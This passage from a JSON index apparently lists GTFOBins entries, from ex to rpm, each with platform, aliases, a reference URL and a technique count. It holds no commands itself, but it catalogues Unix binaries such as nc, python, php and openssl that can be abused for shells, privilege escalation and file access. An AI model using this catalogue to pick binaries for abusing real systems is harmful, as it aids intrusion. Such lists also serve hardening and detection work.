:"ex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ex/"],"count":6},{"id":"gtfo:exiftool","name":"exiftool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/exiftool/"],"count":12},{"id":"gtfo:expand","name":"expand","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expand/"],"count":3},{"id":"gtfo:expect","name":"expect","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expect/"],"count":6},{"id":"gtfo:facter","name":"facter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/facter/"],"count":4},{"id":"gtfo:fail2ban-client","name":"fail2ban-client","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"count":2},{"id":"gtfo:fastfetch","name":"fastfetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"count":9},{"id":"gtfo:ffmpeg","name":"ffmpeg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"count":3},{"id":"gtfo:fgrep","name":"fgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fgrep/"],"count":3},{"id":"gtfo:file","name":"file","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/file/"],"count":6},{"id":"gtfo:find","name":"find","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/find/"],"count":9},{"id":"gtfo:finger","name":"finger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/finger/"],"count":6},{"id":"gtfo:firejail","name":"firejail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/firejail/"],"count":2},{"id":"gtfo:fish","name":"fish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fish/"],"count":3},{"id":"gtfo:flock","name":"flock","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/flock/"],"count":3},{"id":"gtfo:fmt","name":"fmt","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fmt/"],"count":6},{"id":"gtfo:fold","name":"fold","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fold/"],"count":3},{"id":"gtfo:forge","name":"forge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/forge/"],"count":3},{"id":"gtfo:fping","name":"fping","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fping/"],"count":3},{"id":"gtfo:ftp","name":"ftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ftp/"],"count":9},{"id":"gtfo:fzf","name":"fzf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fzf/"],"count":6},{"id":"gtfo:gawk","name":"gawk","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["nawk"],"references":["https://gtfobins.github.io/gtfobins/gawk/"],"count":15},{"id":"gtfo:gcc","name":"gcc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["c89","c99","cc","g++"],"references":["https://gtfobins.github.io/gtfobins/gcc/"],"count":8},{"id":"gtfo:gcloud","name":"gcloud","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcloud/"],"count":3},{"id":"gtfo:gcore","name":"gcore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcore/"],"count":3},{"id":"gtfo:gdb","name":"gdb","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gdb/"],"count":10},{"id":"gtfo:gem","name":"gem","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gem/"],"count":8},{"id":"gtfo:genie","name":"genie","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genie/"],"count":3},{"id":"gtfo:genisoimage","name":"genisoimage","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"count":6},{"id":"gtfo:getent","name":"getent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/getent/"],"count":2},{"id":"gtfo:ghc","name":"ghc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghc/"],"count":2},{"id":"gtfo:ghci","name":"ghci","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghci/"],"count":2},{"id":"gtfo:gimp","name":"gimp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gimp/"],"count":2},{"id":"gtfo:ginsh","name":"ginsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ginsh/"],"count":3},{"id":"gtfo:git","name":"git","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/git/"],"count":17},{"id":"gtfo:gnuplot","name":"gnuplot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"count":3},{"id":"gtfo:go","name":"go","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/go/"],"count":10},{"id":"gtfo:grc","name":"grc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grc/"],"count":2},{"id":"gtfo:grep","name":"grep","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grep/"],"count":3},{"id":"gtfo:gtester","name":"gtester","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gtester/"],"count":6},{"id":"gtfo:guile","name":"guile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/guile/"],"count":3},{"id":"gtfo:gzip","name":"gzip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gzip/"],"count":4},{"id":"gtfo:hashcat","name":"hashcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hashcat/"],"count":2},{"id":"gtfo:head","name":"head","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/head/"],"count":3},{"id":"gtfo:hexdump","name":"hexdump","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["hd"],"references":["https://gtfobins.github.io/gtfobins/hexdump/"],"count":3},{"id":"gtfo:hg","name":"hg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hg/"],"count":3},{"id":"gtfo:highlight","name":"highlight","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/highlight/"],"count":3},{"id":"gtfo:hping3","name":"hping3","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hping3/"],"count":4},{"id":"gtfo:iconv","name":"iconv","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iconv/"],"count":6},{"id":"gtfo:iftop","name":"iftop","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iftop/"],"count":3},{"id":"gtfo:install","name":"install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/install/"],"count":2},{"id":"gtfo:ionice","name":"ionice","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ionice/"],"count":3},{"id":"gtfo:ip","name":"ip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ip/"],"count":6},{"id":"gtfo:iptables-save","name":"iptables-save","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iptables-save/"],"count":1},{"id":"gtfo:irb","name":"irb","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/irb/"],"count":2},{"id":"gtfo:ispell","name":"ispell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ispell/"],"count":3},{"id":"gtfo:java","name":"java","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/java/"],"count":2},{"id":"gtfo:jjs","name":"jjs","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jjs/"],"count":10},{"id":"gtfo:joe","name":"joe","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/joe/"],"count":3},{"id":"gtfo:join","name":"join","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/join/"],"count":3},{"id":"gtfo:journalctl","name":"journalctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/journalctl/"],"count":2},{"id":"gtfo:jq","name":"jq","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jq/"],"count":3},{"id":"gtfo:jrunscript","name":"jrunscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"count":11},{"id":"gtfo:jshell","name":"jshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jshell/"],"count":6},{"id":"gtfo:jtag","name":"jtag","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jtag/"],"count":2},{"id":"gtfo:julia","name":"julia","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/julia/"],"count":15},{"id":"gtfo:knife","name":"knife","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/knife/"],"count":2},{"id":"gtfo:ksshell","name":"ksshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksshell/"],"count":3},{"id":"gtfo:ksu","name":"ksu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksu/"],"count":1},{"id":"gtfo:kubectl","name":"kubectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/kubectl/"],"count":5},{"id":"gtfo:last","name":"last","source":"GTFOBins","platform":["Linux"],"aliases":["lastb"],"references":["https://gtfobins.github.io/gtfobins/last/"],"count":3},{"id":"gtfo:latex","name":"latex","source":"GTFOBins","platform":["Linux"],"aliases":["xelatex"],"references":["https://gtfobins.github.io/gtfobins/latex/"],"count":9},{"id":"gtfo:latexmk","name":"latexmk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/latexmk/"],"count":6},{"id":"gtfo:ld.so","name":"ld.so","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ld.so/"],"count":3},{"id":"gtfo:ldconfig","name":"ldconfig","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"count":3},{"id":"gtfo:less","name":"less","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/less/"],"count":24},{"id":"gtfo:lftp","name":"lftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lftp/"],"count":3},{"id":"gtfo:links","name":"links","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/links/"],"count":3},{"id":"gtfo:ln","name":"ln","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ln/"],"count":1},{"id":"gtfo:loginctl","name":"loginctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/loginctl/"],"count":2},{"id":"gtfo:logrotate","name":"logrotate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logrotate/"],"count":7},{"id":"gtfo:logsave","name":"logsave","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logsave/"],"count":3},{"id":"gtfo:look","name":"look","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/look/"],"count":3},{"id":"gtfo:lp","name":"lp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lp/"],"count":3},{"id":"gtfo:ltrace","name":"ltrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ltrace/"],"count":7},{"id":"gtfo:lua","name":"lua","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lua/"],"count":21},{"id":"gtfo:lualatex","name":"lualatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lualatex/"],"count":3},{"id":"gtfo:luatex","name":"luatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/luatex/"],"count":3},{"id":"gtfo:lwp-download","name":"lwp-download","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"count":8},{"id":"gtfo:lwp-request","name":"lwp-request","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"count":2},{"id":"gtfo:lxd","name":"lxd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lxd/"],"count":4},{"id":"gtfo:m4","name":"m4","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/m4/"],"count":9},{"id":"gtfo:mail","name":"mail","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mail/"],"count":6},{"id":"gtfo:make","name":"make","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/make/"],"count":9},{"id":"gtfo:man","name":"man","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/man/"],"count":9},{"id":"gtfo:mawk","name":"mawk","source":"GTFOBins","platform":["Linux"],"aliases":["awk"],"references":["https://gtfobins.github.io/gtfobins/mawk/"],"count":9},{"id":"gtfo:minicom","name":"minicom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/minicom/"],"count":6},{"id":"gtfo:more","name":"more","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/more/"],"count":6},{"id":"gtfo:mosh-server","name":"mosh-server","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosh-server/"],"count":1},{"id":"gtfo:mosquitto","name":"mosquitto","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"count":3},{"id":"gtfo:mount","name":"mount","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mount/"],"count":1},{"id":"gtfo:msfconsole","name":"msfconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"count":2},{"id":"gtfo:msgattrib","name":"msgattrib","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"count":3},{"id":"gtfo:msgcat","name":"msgcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgcat/"],"count":3},{"id":"gtfo:msgconv","name":"msgconv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgconv/"],"count":3},{"id":"gtfo:msgfilter","name":"msgfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"count":6},{"id":"gtfo:msgmerge","name":"msgmerge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"count":3},{"id":"gtfo:msguniq","name":"msguniq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msguniq/"],"count":3},{"id":"gtfo:mtr","name":"mtr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mtr/"],"count":2},{"id":"gtfo:multitime","name":"multitime","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/multitime/"],"count":3},{"id":"gtfo:mutt","name":"mutt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mutt/"],"count":2},{"id":"gtfo:mv","name":"mv","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mv/"],"count":5},{"id":"gtfo:mypy","name":"mypy","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mypy/"],"count":4},{"id":"gtfo:mysql","name":"mysql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mysql/"],"count":6},{"id":"gtfo:nano","name":"nano","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["pico"],"references":["https://gtfobins.github.io/gtfobins/nano/"],"count":12},{"id":"gtfo:nasm","name":"nasm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nasm/"],"count":3},{"id":"gtfo:nc","name":"nc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nc/"],"count":18},{"id":"gtfo:ncdu","name":"ncdu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncdu/"],"count":3},{"id":"gtfo:ncftp","name":"ncftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncftp/"],"count":3},{"id":"gtfo:needrestart","name":"needrestart","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/needrestart/"],"count":2},{"id":"gtfo:neofetch","name":"neofetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/neofetch/"],"count":4},{"id":"gtfo:nft","name":"nft","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nft/"],"count":2},{"id":"gtfo:nginx","name":"nginx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nginx/"],"count":5},{"id":"gtfo:nice","name":"nice","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nice/"],"count":3},{"id":"gtfo:nl","name":"nl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nl/"],"count":3},{"id":"gtfo:nm","name":"nm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nm/"],"count":3},{"id":"gtfo:nmap","name":"nmap","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nmap/"],"count":12},{"id":"gtfo:node","name":"node","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/node/"],"count":22},{"id":"gtfo:nohup","name":"nohup","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nohup/"],"count":6},{"id":"gtfo:npm","name":"npm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/npm/"],"count":6},{"id":"gtfo:nroff","name":"nroff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nroff/"],"count":4},{"id":"gtfo:nsenter","name":"nsenter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nsenter/"],"count":3},{"id":"gtfo:ntpdate","name":"ntpdate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"count":3},{"id":"gtfo:octave","name":"octave","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/octave/"],"count":9},{"id":"gtfo:od","name":"od","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/od/"],"count":3},{"id":"gtfo:opencode","name":"opencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opencode/"],"count":5},{"id":"gtfo:openssl","name":"openssl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openssl/"],"count":21},{"id":"gtfo:openvpn","name":"openvpn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvpn/"],"count":6},{"id":"gtfo:openvt","name":"openvt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvt/"],"count":1},{"id":"gtfo:opkg","name":"opkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opkg/"],"count":1},{"id":"gtfo:pandoc","name":"pandoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pandoc/"],"count":9},{"id":"gtfo:passwd","name":"passwd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/passwd/"],"count":1},{"id":"gtfo:paste","name":"paste","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/paste/"],"count":3},{"id":"gtfo:pax","name":"pax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pax/"],"count":3},{"id":"gtfo:pdb","name":"pdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdb/"],"count":2},{"id":"gtfo:pdflatex","name":"pdflatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdflatex/"],"count":9},{"id":"gtfo:pdftex","name":"pdftex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pdftex/"],"count":3},{"id":"gtfo:perf","name":"perf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perf/"],"count":3},{"id":"gtfo:perl","name":"perl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perl/"],"count":14},{"id":"gtfo:perlbug","name":"perlbug","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/perlbug/"],"count":2},{"id":"gtfo:pexec","name":"pexec","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pexec/"],"count":3},{"id":"gtfo:pg","name":"pg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pg/"],"count":6},{"id":"gtfo:php","name":"php","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/php/"],"count":40},{"id":"gtfo:pic","name":"pic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pic/"],"count":6},{"id":"gtfo:pidstat","name":"pidstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pidstat/"],"count":3},{"id":"gtfo:pip","name":"pip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pip/"],"count":4},{"id":"gtfo:pipx","name":"pipx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pipx/"],"count":2},{"id":"gtfo:pkexec","name":"pkexec","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkexec/"],"count":1},{"id":"gtfo:pkg","name":"pkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pkg/"],"count":1},{"id":"gtfo:plymouth","name":"plymouth","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/plymouth/"],"count":3},{"id":"gtfo:podman","name":"podman","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/podman/"],"count":2},{"id":"gtfo:poetry","name":"poetry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/poetry/"],"count":2},{"id":"gtfo:posh","name":"posh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/posh/"],"count":2},{"id":"gtfo:pr","name":"pr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pr/"],"count":3},{"id":"gtfo:procmail","name":"procmail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/procmail/"],"count":2},{"id":"gtfo:pry","name":"pry","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pry/"],"count":2},{"id":"gtfo:psftp","name":"psftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psftp/"],"count":3},{"id":"gtfo:psql","name":"psql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/psql/"],"count":6},{"id":"gtfo:ptx","name":"ptx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ptx/"],"count":3},{"id":"gtfo:puppet","name":"puppet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/puppet/"],"count":6},{"id":"gtfo:pwsh","name":"pwsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pwsh/"],"count":4},{"id":"gtfo:pygmentize","name":"pygmentize","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pygmentize/"],"count":2},{"id":"gtfo:pyright","name":"pyright","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pyright/"],"count":6},{"id":"gtfo:python","name":"python","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/python/"],"count":26},{"id":"gtfo:qpdf","name":"qpdf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/qpdf/"],"count":3},{"id":"gtfo:rake","name":"rake","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rake/"],"count":4},{"id":"gtfo:ranger","name":"ranger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ranger/"],"count":2},{"id":"gtfo:rc","name":"rc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rc/"],"count":3},{"id":"gtfo:readelf","name":"readelf","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/readelf/"],"count":3},{"id":"gtfo:redcarpet","name":"redcarpet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"count":2},{"id":"gtfo:redis","name":"redis","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/redis/"],"count":3},{"id":"gtfo:restic","name":"restic","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/restic/"],"count":15},{"id":"gtfo:rev","name":"rev","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rev/"],"count":3},{"id":"gtfo:rlogin","name":"rlogin","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlogin/"],"count":3},{"id":"gtfo:rlwrap","name":"rlwrap","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/rlwrap/"],"count":6},{"id":"gtfo:rpm","name":"rpm","source":"GTFO